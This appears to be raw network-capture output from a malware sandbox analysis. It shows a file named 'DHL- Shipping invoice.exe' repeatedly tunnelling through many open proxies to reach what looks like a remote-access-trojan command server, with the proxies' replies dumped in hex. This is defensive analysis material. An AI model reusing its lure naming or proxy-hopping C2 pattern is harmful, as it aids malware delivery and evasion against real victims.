                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1648192.168.2.454780217.145.199.47567466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.252438068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.953253031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1649192.168.2.45475014.50.81.64806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.344616890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1650192.168.2.454702103.86.109.38806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.344726086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1651192.168.2.454735121.66.198.7641456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.344743013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1652192.168.2.454703103.127.1.130806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.345227957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1653192.168.2.45365674.119.147.20941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.346985102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1654192.168.2.454213195.177.217.131605666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.350478888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.359505892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.363071918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.453233004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1655192.168.2.454981172.67.182.60806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.350594997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.437455893 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1656192.168.2.45314137.44.247.21731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.350629091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.343790054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.453422070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.500549078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.597178936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.640523911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:54.640397072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:18.656025887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:06.718677044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1657192.168.2.454742123.30.154.17177776484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.350862980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.698946953 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.10.3 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1658192.168.2.454864147.75.34.8694016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.351010084 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:06.517333984 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1659192.168.2.454983104.18.103.125806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.351161003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.438710928 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1660192.168.2.45489138.54.101.25431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.352179050 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:06.953252077 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:07.453588009 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:08.453411102 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:10.266056061 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:12.250137091 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:14.062552929 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:17.751177073 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:25.062824011 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1661192.168.2.45478260.188.102.225180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.352493048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1662192.168.2.450149119.47.90.2580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.355690956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.359450102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.224708080 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1663192.168.2.454715103.231.45.14510806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.356241941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1664192.168.2.454781203.218.172.22580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.356482029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1665192.168.2.454871199.102.107.14541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.356508970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1666192.168.2.45496751.222.241.8495596484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.356654882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.765724897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.265925884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1667192.168.2.45488895.164.89.12388886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.357176065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1668192.168.2.45490934.83.143.631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.362672091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.860245943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453381062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453532934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.453258991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.453331947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.389436007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.246294975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.750014067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1669192.168.2.454910165.231.101.229806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.362909079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.523489952 CET401INHTTP/1.0 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm="login"
                            Connection: close
                            Content-type: text/html; charset=utf-8
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1670192.168.2.45314337.18.73.6055666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.363987923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.566226959 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 